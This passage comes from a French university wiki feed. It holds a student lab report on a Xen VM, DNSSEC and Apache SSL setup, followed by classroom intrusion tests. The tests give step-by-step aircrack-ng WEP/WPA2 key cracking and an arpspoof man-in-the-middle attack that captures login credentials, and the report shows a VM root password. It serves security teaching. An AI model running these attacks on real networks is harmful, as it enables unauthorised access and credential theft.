Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Glopglop.site_Securis%C3%A9.png&amp;diff=54008</id>
		<title>Fichier:Glopglop.site Securisé.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Glopglop.site_Securis%C3%A9.png&amp;diff=54008"/>
				<updated>2020-11-27T16:56:44Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : Aglaine a téléversé une nouvelle version de Fichier:Glopglop.site Securisé.png&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54007</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54007"/>
				<updated>2020-11-27T16:55:09Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Modification de la page d'accueille Apashe2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
